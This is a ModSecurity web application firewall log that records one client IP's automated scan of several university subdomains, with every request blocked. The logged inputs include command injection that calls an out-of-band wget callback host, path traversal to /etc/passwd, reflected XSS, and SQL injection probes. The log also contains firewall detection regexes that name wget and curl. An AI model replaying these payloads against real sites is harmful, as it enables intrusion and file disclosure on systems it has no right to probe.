[Tue Aug 29 11:46:02.449215 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAhZRi8AAAAG"]
[Tue Aug 29 11:46:03.409509 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14C8Co-f0AAAipS4oAAAAF"]
[Tue Aug 29 11:46:03.572009 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14C8Co-f0AAAi5uB8AAAAS"]
[Tue Aug 29 11:46:04.501202 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14DMCo-f0AAAfEB5gAAAAO"]
[Tue Aug 29 11:46:07.370370 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gky5k6sw8pijcp.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAhBSFYAAAAX"]
[Tue Aug 29 11:46:07.379067 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gjzxbpdapuumca.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAi5uCgAAAAS"]
[Tue Aug 29 11:46:07.384046 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gog49hb4mg3bem.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAi2yBYAAAAN"]
[Tue Aug 29 11:46:07.399763 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26ghxgfd3phneofc.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAi5uCkAAAAS"]
[Tue Aug 29 11:46:07.410443 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gjpm1pcygcm75x.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAi0JI8AAAAK"]
[Tue Aug 29 11:46:08.352966 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAdxUpkAAAAC"]
[Tue Aug 29 11:46:08.364282 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAhT32EAAAAD"]
[Tue Aug 29 11:46:08.379881 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gte1xf3p4p7xsk.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14EMCo-f0AAAdxUpoAAAAC"]
[Tue Aug 29 11:46:08.408118 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAib5yUAAAAA"]
[Tue Aug 29 11:46:08.415254 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAhlz-IAAAAi"]
[Tue Aug 29 11:46:08.430962 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAib5yYAAAAA"]
[Tue Aug 29 11:46:09.433588 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAfEB6AAAAAO"]
[Tue Aug 29 11:46:09.456574 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhtji4AAAAq"]
[Tue Aug 29 11:46:09.478240 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhlz-gAAAAi"]
[Tue Aug 29 11:46:09.515326 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAfEB6QAAAAO"]
[Tue Aug 29 11:46:09.515651 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhlz-oAAAAi"]
[Tue Aug 29 11:46:09.516241 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAipS5cAAAAF"]
[Tue Aug 29 11:46:09.528118 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAib5y0AAAAA"]
[Tue Aug 29 11:46:09.537060 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAi5uDcAAAAS"]
[Tue Aug 29 11:46:09.555817 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAfEB6YAAAAO"]
[Tue Aug 29 11:46:09.563100 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAipS5kAAAAF"]
[Tue Aug 29 11:46:09.566415 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAib5y8AAAAA"]
[Tue Aug 29 11:46:10.363238 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EsCo-f0AAAdxUp4AAAAC"]
[Tue Aug 29 11:46:10.436817 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EsCo-f0AAAhZRlUAAAAG"]
[Tue Aug 29 11:46:12.386993 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAfEB7YAAAAO"]
[Tue Aug 29 11:46:12.389251 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAi2yCEAAAAN"]
[Tue Aug 29 11:46:12.424798 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAi5uEAAAAAS"]
[Tue Aug 29 11:46:12.452590 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAdxUqkAAAAC"]
[Tue Aug 29 11:46:12.490431 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAib5z0AAAAA"]
